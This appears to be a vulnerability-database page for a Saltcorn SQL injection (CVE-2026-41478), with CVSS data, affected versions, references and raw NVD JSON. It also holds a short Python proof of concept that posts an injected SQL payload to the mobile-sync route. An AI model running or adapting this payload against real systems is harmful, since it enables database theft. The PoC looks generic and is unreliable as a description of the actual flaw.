CVE-2026-41478

Description

Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.6, 1.5.6, and 1.6.0-beta.5, a SQL injection vulnerability in Saltcorn’s mobile-sync routes allows any authenticated low-privilege user with read access to at least one table to inject arbitrary SQL through sync parameters. This can lead to full database exfiltration, including admin password hashes and configuration secrets, and may also enable database modification or destruction depending on the backend. This vulnerability is fixed in 1.4.6, 1.5.6, and 1.6.0-beta.5.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:saltcorn:saltcorn:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha0:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha10:*:*:*:*:*:* - VULNERABLE

Saltcorn < 1.4.6

Saltcorn < 1.5.6

Saltcorn < 1.6.0-beta.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-41478 PoC Example
# Target: Saltcorn mobile-sync route
# Requires: Low-privilege authenticated user

target_url = "https://<target-host>/mobile/sync"
session_cookie = "<valid_session_cookie>" # Low priv user session

headers = {
    "Cookie": f"saltcorn_session={session_cookie}",
    "Content-Type": "application/json"
}

# Malicious payload to extract version
payload = {
    "table": "users",
    "changes": "1=1; SELECT * FROM information_schema.tables; --"
}

response = requests.post(target_url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Potential SQL Injection successful!")
    print("[+] Response:", response.text)
else:
    print("[-] Failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41478
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41478
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41478/
[4] VulDB https://vuldb.com/cve/CVE-2026-41478
[5] https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh
[6] https://github.com/saltcorn/saltcorn/security/advisories/GHSA-jp74-mfrx-3qvh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41478", "sourceIdentifier": "[email protected]", "published": "2026-04-24T21:16:19.353", "lastModified": "2026-04-28T14:58:44.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.6, 1.5.6, and 1.6.0-beta.5, a SQL injection vulnerability in Saltcorn’s mobile-sync routes allows any authenticated low-privilege user with read access to at least one table to inject arbitrary SQL through sync parameters. This can lead to full database exfiltration, including admin password hashes and configuration secrets, and may also enable database modification or destruction depending on the backend. This vulnerability is fixed in 1.4.6, 1.5.6, and 1.6.0-beta.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.6", "matchCriteriaId": "08967BF9-FA6A-4810-8533-60AE07024CB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.5.0", "versionEndExcluding": "1.5.6", "matchCriteriaId": "102B07EA-0948-4E2F-8737-C14A2EDEF7E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha0:*:*:*:*:*:*", "matchCriteriaId": "B9F0B1DA-694D-46DC-B1C3-B013AC4A849C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "5A1F05CD-57F4-419B-ACA8-D7C9B6368863"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha10:*:*:*:*:*:*", "matchCriteriaId": "EBF44DCF-6989-4E65-97D0-7C8A9260189A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha11:*:*:*:*:*:*", "matchCriteriaId": "E6666919-896F-4D1D-8225-3E91BAC9F101"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha12:*:*:*:*:*:*", "matchCriteriaId": "B1724AAF-1FDA-402D-94D2-86CF9DD8839C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha13:*:*:*:*:*:*", "matchCriteriaId": "696855BA-6E8A-4170-8CC9-8C267C85397B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha14:*:*:*:*:*:*", "matchCriteriaId": "8B954E3D-95F4-49FB-8A3A-1DFAE831EAEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha15:*:*:*:*:*:*", "matchCriteriaId": "E0EEE350-1436-4C28-B0D7-B2EC26CEF65C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha16:*:*:*:*:*:*", "matchCriteriaId": "DD555EEB-8C7B-4519-8037-3F4E8CDFFA51"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha17:*:*:*:*:*:*", "matchCriteriaId": "12C8A9DD-0E70-4BD2-A0DF-8951757200DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "E8F83440-DA15-4415-B29F-4710021E06A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "0276E1CB-EFFA-47DF-A281-3317F9EA566E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "399C6A3D-4EC0-498A-98E6-A81E581E8A10"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "9A768259-04EC-4EA7-83E6-F802A43F7F12"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha6:*:*:*:*:*:*", "matchCriteriaId": "9E0E2D7E-96AA-427A-9043-460C8D6C718E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha7:*:*:*:*:*:*", "matchCriteriaId": "22CA8D18-519C-4DA9-B245-2E2BA6651ED7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha8:*:*:*:*:*:*", "matchCriteriaId": "E2820DF8-8124-4880-86F4-A262E5E884AB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha9:*:*:*:*:*:*", "matchCriteriaId": "2A3A7215-0C13-4611-8846-804853DAA0B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "480F4CEF-4019-41AC-AD7B-8D317619132A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "CB023AEF-5AEF-4923-9552-028BF47D7119"}, {"vulnerable": true, "criteria": "cpe:2.3:a:saltcorn:saltcorn:1.6.0:beta3:*:*:*:*:*:*", "mat ... (truncated)